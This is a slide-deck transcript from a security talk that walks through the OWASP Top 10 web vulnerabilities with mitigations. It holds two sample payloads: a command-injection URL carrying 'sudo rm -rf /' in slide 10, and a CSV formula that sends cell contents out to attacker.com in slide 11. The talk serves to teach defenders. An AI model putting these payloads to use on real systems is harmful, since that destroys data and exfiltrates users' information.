Let's talk Security

Transcript

1. Let’s talk Security Understanding, Exploiting and Defending against Top Web

   Vulnerabilities Dheeraj Joshi djadmin.in

2. About Me I find security vulnerabilities for fun & swag

   and I wear White Hat. Uber, CKEditor, Dropbox, MailChimp, InVision, DigitalOcean, CloudFare, Intuit, Groupon, etc. What makes me happy?

3. Security - Into The Details • Owasp’s Top 10 Vulnerabilities

   ◦ Explain ◦ Impact ◦ Defense ◦ Real examples (External + Internal) • Demo - RCE • Q & A

4. Why should Startups Care about Security? Startups & SMEs are

   impromptu for cutting corners. One of the first things they cut is ‘Security'.
5. None

6. HACKER PUTS HOSTING SERVICE CODE SPACES OUT OF BUSINESS The

   Shutdown

7. OWASP Top 10 And Beyond

8. INJECTION

9. PREVENT INJECTION • For databases use prepared statements • Whitelist

   inputs wherever possible • Sanitize inputs (use filter extension) • Don’t trust user input and always verify!

10. Example Google Command Injection We can include any command in

    the URL below https://console.cloud.google.com/home/dashboard? project=;sudo rm -rf / Found by an Indian Security Researcher (S. Venkatesh)

11. Exploiting ‘Export as CSV’ functionality Formula Injection =HYPERLINK("http://attacker.com?leak="&A1&A2,"Error: please click

    for further information") Fix - Append a single quote (‘) to the list of formula triggers ( =, +, -) If victim clicks this cell, they will inadvertently exfiltrate the contents of cells A1 and A2 to attacker website, which may include other users’ sensitive information.

12. BROKEN AUTHENTICATION AND SESSION MANAGEMENT

13. MITIGATION • Enforce strong password policy • Require periodic reset

    of password • Use 2 factor authentication • Use SSL and secure flag on cookies • Don’t neglect failed-login detection & tracking • Only use httpOnly cookies

14. CROSS SITE SCRIPTING - XSS • XSS attack users •

    “Javascript Injection” • Exploits can be bad, really bad..

15. What is XSS? Typical Reflected XSS

16. Stored XSS

17. DOM XSS

18. Protect Yourself • Use filter extension to filter inputs •

    Ensure that outputs are HTML encoded • Don’t reinvent the wheel • Don’t consider any part of the request as being “safe”

19. ngBind attribute $sanitize - service in module ngSanitize Sanitizes an

    html string by stripping all potentially dangerous tokens.

20. INSECURE DIRECT OBJECT REFERENCES

21. Scenario / Exploit 1) First, an attacker signup for an

    account and request ”forgot password”. 2) You will receive a link : https://vimeo.com/forgot_password/[user id]/[token]

22. Prevention • Low level access controls • Prevent user input

    in file/URL access commands • No unsanitized input to execution commands

23. SECURITY MISCONFIGURATION

24. PREVENTION > CURE • Perform periodic security checks using automated

    tools • Static Code Analysis • Example : Hardening MySQL, Directory Listing, Auth Tokens

25. SENSITIVE DATA EXPOSURE • Exposed PHP error messages • Unencrypted

    sensitive data storage • Not using SSL • Example: a sensitive token should not be sent to external websites (Fitbit)

26. MISSING FUNCTION LEVEL ACCESS CONTROL • Valid input processing without

    access controls • Decentralized access control layer • Example : Profile email address not validated (Github), S3 configuration

27. • Don’t perform data changes on GET • Use secure

    (csrf) tokens for POST • Impact : Real bad, attack users • Example : Dropbox, CodeSchool CROSS-SITE REQUEST FORGERY (CSRF)

28. • Not keeping libraries up-to-date • *cough*Wordpress*cough* • Example :

    Third-Party Libraries (Apache CXF Authentication Bypass, Spring RCE) USING COMPONENTS WITH KNOWN VULNERABILITIES

29. UNVALIDATED REDIRECTS AND FORWARDS • Header Injection • JavaScript Parameter

    Injection • Reliance on HTTP_REFERER • Abuse window opener (Facebook)

30. Example : Dropbox Open Redirect in v1 API

31. Remote Code Execution

32. The solution • Reset all passwords and keys • Remove

    backdoors (not easy) OR Destroy everything??

33. Thank you References : • https://www.owasp.org • https://djadmin.in/pwn/ (tools)